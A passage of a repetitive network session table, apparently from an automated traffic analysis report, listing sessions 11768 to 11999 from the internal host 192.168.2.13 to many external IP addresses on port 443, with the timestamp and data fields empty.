                              Session IDSource IPSource PortDestination IPDestination Port
                              11768192.168.2.1339418170.235.2.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11769192.168.2.1359308102.136.250.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11770192.168.2.135413884.28.136.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11771192.168.2.1334518205.189.231.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11772192.168.2.1333638184.215.237.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11773192.168.2.135517813.118.20.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11774192.168.2.1339850200.66.55.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11775192.168.2.133445286.14.188.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11776192.168.2.1340062173.17.38.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11777192.168.2.1335088206.64.211.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11778192.168.2.1355682186.6.202.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11779192.168.2.134350835.68.76.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11780192.168.2.1348600183.25.208.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11781192.168.2.135204018.165.123.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11782192.168.2.1355034205.86.126.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11783192.168.2.134970448.208.250.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11784192.168.2.1344852223.4.109.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11785192.168.2.1347728186.20.92.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11786192.168.2.1344358171.104.188.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11787192.168.2.134371865.153.72.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11788192.168.2.1359814134.168.124.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11789192.168.2.1334722175.19.154.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11790192.168.2.1337450207.94.213.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11791192.168.2.1342508146.15.47.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11792192.168.2.134565692.78.78.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11793192.168.2.1348522155.50.53.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11794192.168.2.1334078168.52.119.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11795192.168.2.1348096151.34.233.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11796192.168.2.1342328173.23.144.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11797192.168.2.1340410113.133.85.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11798192.168.2.134409618.58.115.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11799192.168.2.1337482202.128.221.247443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11800192.168.2.134838048.182.237.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11801192.168.2.1351308105.115.11.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11802192.168.2.1354056187.231.168.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11803192.168.2.1349816202.59.119.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11804192.168.2.133414253.246.15.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11805192.168.2.1341614192.242.189.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11806192.168.2.1340392119.112.255.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11807192.168.2.133534298.28.85.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11808192.168.2.1333006134.104.0.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11809192.168.2.133832227.149.212.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11810192.168.2.1342824124.59.143.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11811192.168.2.134787475.8.105.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11812192.168.2.1345380209.222.162.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11813192.168.2.1346468188.78.138.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11814192.168.2.1338238218.188.184.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11815192.168.2.1336224193.66.92.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11816192.168.2.134108486.124.60.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11817192.168.2.134864092.51.59.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11818192.168.2.134879423.228.76.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11819192.168.2.135115894.198.215.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11820192.168.2.1341448180.37.70.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11821192.168.2.134970643.250.56.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11822192.168.2.1344502179.245.217.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11823192.168.2.134063462.234.111.215443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11824192.168.2.1343642159.161.18.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11825192.168.2.133477423.108.96.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11826192.168.2.1360594156.66.50.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11827192.168.2.135013025.57.19.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11828192.168.2.1335016218.132.118.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11829192.168.2.1341434167.204.223.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11830192.168.2.1349198165.182.173.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11831192.168.2.135215888.177.21.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11832192.168.2.13493325.233.164.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11833192.168.2.135104672.219.253.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11834192.168.2.1347568197.158.77.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11835192.168.2.1336254196.111.26.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11836192.168.2.1346262105.174.7.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11837192.168.2.1355152121.22.54.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11838192.168.2.133389053.154.19.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11839192.168.2.1342376192.48.153.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11840192.168.2.133915442.64.88.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11841192.168.2.133874696.175.31.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11842192.168.2.1350356188.224.117.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11843192.168.2.134401251.125.77.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11844192.168.2.135047453.207.230.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11845192.168.2.135196443.121.151.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11846192.168.2.134877227.31.14.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11847192.168.2.1337326118.220.12.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11848192.168.2.1351078173.252.245.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11849192.168.2.1340438207.183.75.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11850192.168.2.1355322138.181.83.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11851192.168.2.135057274.223.165.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11852192.168.2.135673680.179.126.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11853192.168.2.1352676155.170.177.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11854192.168.2.1354694200.202.175.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11855192.168.2.1347974220.142.99.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11856192.168.2.1335992147.139.244.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11857192.168.2.1360212133.105.59.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11858192.168.2.135171264.145.30.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11859192.168.2.1359448100.255.246.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11860192.168.2.1333276140.64.249.119443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11861192.168.2.136018077.234.59.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11862192.168.2.1358192162.230.80.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11863192.168.2.134714689.191.17.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11864192.168.2.134004299.59.57.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11865192.168.2.133545458.7.124.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11866192.168.2.135600674.201.120.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11867192.168.2.1342908118.247.166.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11868192.168.2.1354142144.109.170.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11869192.168.2.1347406158.150.196.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11870192.168.2.1336726118.247.93.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11871192.168.2.1356640136.161.46.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11872192.168.2.136074883.164.240.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11873192.168.2.1337056153.78.90.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11874192.168.2.134178061.100.250.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11875192.168.2.1357756101.160.194.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11876192.168.2.1358060198.37.211.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11877192.168.2.133817423.227.97.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11878192.168.2.134367823.19.242.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11879192.168.2.135778853.248.208.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11880192.168.2.1353154154.171.155.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11881192.168.2.134417863.210.229.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11882192.168.2.135555291.78.240.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11883192.168.2.135940439.128.169.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11884192.168.2.13447068.4.64.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11885192.168.2.135635438.195.239.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11886192.168.2.136026034.97.99.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11887192.168.2.1337596175.131.190.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11888192.168.2.1360280182.54.133.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11889192.168.2.133699897.102.96.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11890192.168.2.1338232150.219.169.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11891192.168.2.134635240.208.43.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11892192.168.2.1347756112.13.10.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11893192.168.2.1359886145.240.77.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11894192.168.2.134344253.32.126.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11895192.168.2.1355092219.79.194.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11896192.168.2.135099269.25.168.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11897192.168.2.1360898175.131.221.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11898192.168.2.1333562130.81.212.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11899192.168.2.1334304175.95.117.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11900192.168.2.1341170149.174.166.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11901192.168.2.135243667.8.29.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11902192.168.2.1351274100.47.222.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11903192.168.2.1342330103.26.82.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11904192.168.2.1338278163.164.186.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11905192.168.2.1338284192.32.108.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11906192.168.2.1334866148.59.151.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11907192.168.2.13539288.112.231.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11908192.168.2.1352292222.96.141.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11909192.168.2.135586454.78.206.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11910192.168.2.135514813.150.142.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11911192.168.2.13557088.124.159.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11912192.168.2.133816687.82.5.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11913192.168.2.1346648157.97.19.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11914192.168.2.1359556180.64.26.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11915192.168.2.135114659.8.41.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11916192.168.2.135252846.253.118.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11917192.168.2.134764085.123.236.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11918192.168.2.134675497.113.215.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11919192.168.2.1360886180.67.116.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11920192.168.2.133552231.23.138.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11921192.168.2.1360094165.218.143.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11922192.168.2.135511441.140.115.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11923192.168.2.133894225.91.28.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11924192.168.2.134371097.142.251.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11925192.168.2.133996646.59.221.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11926192.168.2.1336724158.54.121.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11927192.168.2.1360896208.62.149.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11928192.168.2.1338068191.22.82.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11929192.168.2.1360604106.140.244.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11930192.168.2.1346262222.137.165.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11931192.168.2.134685876.42.74.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11932192.168.2.1346232165.157.70.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11933192.168.2.1341350112.146.213.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11934192.168.2.1347500217.166.2.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11935192.168.2.134008248.200.73.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11936192.168.2.1359112201.225.191.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11937192.168.2.136078824.8.79.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11938192.168.2.134546666.3.119.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11939192.168.2.1343534206.58.227.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11940192.168.2.136076260.48.39.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11941192.168.2.134005282.170.40.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11942192.168.2.1356030162.127.194.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11943192.168.2.136013691.98.182.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11944192.168.2.134705672.34.183.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11945192.168.2.133702070.175.166.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11946192.168.2.135449023.225.109.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11947192.168.2.1346840185.42.220.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11948192.168.2.1339258109.150.91.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11949192.168.2.135559851.95.118.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11950192.168.2.135219884.115.66.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11951192.168.2.1358124186.236.119.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11952192.168.2.135523897.130.229.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11953192.168.2.1344906206.201.236.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11954192.168.2.1359914197.227.112.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11955192.168.2.1334106134.174.212.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11956192.168.2.1342500213.40.219.205443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11957192.168.2.1349790183.148.26.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11958192.168.2.1332784120.76.79.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11959192.168.2.134079678.144.222.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11960192.168.2.135207834.88.57.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11961192.168.2.134897877.136.15.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11962192.168.2.1351632136.123.218.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11963192.168.2.134776685.189.228.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11964192.168.2.1353520187.57.107.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11965192.168.2.1347330140.90.0.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11966192.168.2.1359414118.17.114.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11967192.168.2.134502062.64.246.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11968192.168.2.1354434193.138.157.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11969192.168.2.1334084124.187.151.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11970192.168.2.1345306210.92.158.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11971192.168.2.1340450122.187.68.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11972192.168.2.1348708186.30.15.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11973192.168.2.134366290.222.184.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11974192.168.2.1336386133.64.224.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11975192.168.2.1346874141.122.166.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11976192.168.2.133626866.107.32.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11977192.168.2.1358776204.59.250.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11978192.168.2.134392499.133.176.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11979192.168.2.135860295.250.20.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11980192.168.2.1355172109.162.87.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11981192.168.2.1338142175.61.20.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11982192.168.2.1357374141.178.177.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11983192.168.2.135591412.124.174.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11984192.168.2.135329617.157.191.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11985192.168.2.133489864.17.143.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11986192.168.2.1360260205.195.108.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11987192.168.2.1340818163.35.145.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11988192.168.2.1345878203.99.10.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11989192.168.2.133830092.181.12.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11990192.168.2.1357058139.177.55.173443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11991192.168.2.136013838.2.245.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11992192.168.2.135980069.114.223.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11993192.168.2.135182266.153.163.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11994192.168.2.133869617.156.201.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11995192.168.2.133778653.146.246.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11996192.168.2.13424721.65.14.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11997192.168.2.1333530193.5.90.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11998192.168.2.13593062.134.146.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11999192.168.2.1338308191.112.118.148443
                              TimestampBytes transferredDirectionData


